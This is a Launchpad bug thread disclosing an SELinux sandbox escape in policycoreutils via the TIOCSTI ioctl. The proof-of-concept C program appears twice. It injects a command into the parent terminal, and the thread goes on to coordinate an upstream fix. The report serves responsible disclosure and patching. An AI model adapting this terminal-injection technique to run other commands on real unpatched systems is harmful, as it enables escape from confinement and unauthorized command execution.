Debian
policycoreutils package

SELinux sandbox escape via TIOCSTI ioctl

Bug #1626706 reported by Federico Bento
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
policycoreutils (Debian)
Fix Released
Unknown
policycoreutils (Ubuntu)
Fix Released
Undecided
Unassigned

Bug Description

Hi,

When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.

CVE References

Revision history for this message
Seth Arnold (seth-arnold) wrote :

Hello Federico, thanks for the report; is this issue known upstream yet? If not, can you please report it to them? Once known, can you please add a link to their bug report here?

policycoreutils is in universe, which means it is community-supported. Would you be in a position to prepare and test fixes once fixes are available from upstream?

Thanks

Revision history for this message
Federico Bento (up201407890) wrote : Re: [Bug 1626706] Re: SELinux sandbox escape via TIOCSTI ioctl

Citando "Seth Arnold" <email address hidden>:

> Hello Federico, thanks for the report; is this issue known upstream yet?
> If not, can you please report it to them? Once known, can you please add
> a link to their bug report here?

Reported the issue just now to upstream.

> policycoreutils is in universe, which means it is community-supported.
> Would you be in a position to prepare and test fixes once fixes are
> available from upstream?
>
> Thanks

Yes, i'll be glad to. Also, the 'runcon' utility is vulnerable.

> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1626706
>
> Title:
> SELinux sandbox escape via TIOCSTI ioctl
>
> Status in policycoreutils package in Ubuntu:
> New
>
> Bug description:
> Hi,
>
> When executing a program via the SELinux sandbox, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> escape the sandbox.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
>
> $ gcc test.c -o test
> $ /bin/sandbox ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
> $ id <------ did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
>
> This is similar to CVE-2016-2568, CVE-2016-2779, etc.
>
> Thanks,
> Federico Bento.
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/policycoreutils/+bug/1626706/+subscriptions
>

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Revision history for this message
Federico Bento (up201407890) wrote :

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Revision history for this message
Seth Arnold (seth-arnold) wrote :

Very nice; can you prepare and test updated packages? Some information on the process is at https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

Thanks

information type: Private Security → Public Security
Changed in policycoreutils (Ubuntu):
status: New → Confirmed
Revision history for this message
Laurent Bigonville (bigon) wrote :

This has been fixed in 2.5-3, I guess you want to sync from debian

Bug Watch Updater (bug-watch-updater)
Changed in policycoreutils (Debian):
status: Unknown → Fix Released
Laurent Bigonville (bigon)
Changed in policycoreutils (Ubuntu):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.